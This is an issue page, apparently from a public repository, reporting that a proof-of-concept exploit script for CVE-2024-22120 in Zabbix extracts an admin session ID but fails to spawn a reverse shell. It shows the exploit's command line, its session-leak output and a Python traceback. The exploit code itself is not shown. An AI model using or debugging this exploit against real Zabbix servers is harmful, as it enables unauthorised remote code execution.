CVE-2024-22120-RCE icon indicating copy to clipboard operation
CVE-2024-22120-RCE copied to clipboard

Published 20 hours ago verified publisher icon W01fh4cker

Doesn't spawn the shell

Open e-i-tz opened this issue 5 months ago • 0 comments

My system: Kali 6.6.15 zabbix version - 6.4.5; Zabbix system - Ubuntu 22.04 LTS.

CVE-2024-22120-RCE.py gets session_id fine but has a problem with revshell spawn.

Error

└─$ python CVE-2024-22120-RCE.py --ip 192.168.19.156 --sid 813b3ec4a7b91a76beafd4b14ddedfdb --hostid 10084 (+) session_id=5 (+) session_id=50 (+) session_id=50f (+) session_id=50f9 (+) session_id=50f9e (+) session_id=50f9ec (+) session_id=50f9ecd (+) session_id=50f9ecdd (+) session_id=50f9ecdd1 (+) session_id=50f9ecdd15 (+) session_id=50f9ecdd15f (+) session_id=50f9ecdd15fd (+) session_id=50f9ecdd15fd7 (+) session_id=50f9ecdd15fd78 (+) session_id=50f9ecdd15fd788 (+) session_id=50f9ecdd15fd7885 (+) session_id=50f9ecdd15fd78851 (+) session_id=50f9ecdd15fd788517 (+) session_id=50f9ecdd15fd788517f (+) session_id=50f9ecdd15fd788517f3 (+) session_id=50f9ecdd15fd788517f39 (+) session_id=50f9ecdd15fd788517f393 (+) session_id=50f9ecdd15fd788517f3938 (+) session_id=50f9ecdd15fd788517f3938f (+) session_id=50f9ecdd15fd788517f3938fc (+) session_id=50f9ecdd15fd788517f3938fca (+) session_id=50f9ecdd15fd788517f3938fcad (+) session_id=50f9ecdd15fd788517f3938fcadf (+) session_id=50f9ecdd15fd788517f3938fcadf5 (+) session_id=50f9ecdd15fd788517f3938fcadf54 (+) session_id=50f9ecdd15fd788517f3938fcadf54a (+) session_id=50f9ecdd15fd788517f3938fcadf54a0 Traceback (most recent call last): File "/home/erik/CVE-2024-22120-RCE/CVE-2024-22120-RCE(1).py", line 138, in RceExploit(args.ip, args.hostid, admin_sessionid) File "/home/erik/CVE-2024-22120-RCE/CVE-2024-22120-RCE(1).py", line 97, in RceExploit scriptid = CreateScript(url, headers, admin_sessionid, "whoami") ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home/erik/CVE-2024-22120-RCE/CVE-2024-22120-RCE(1).py", line 62, in CreateScript return json.loads(resp.text)["result"]["scriptids"][0] ^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/json/init.py", line 346, in loads return _default_decoder.decode(s) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/json/decoder.py", line 337, in decode obj, end = self.raw_decode(s, idx=_w(s, 0).end()) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/json/decoder.py", line 355, in raw_decode raise JSONDecodeError("Expecting value", s, err.value) from None json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

e-i-tz avatar Sep 10 '24 20:09 e-i-tz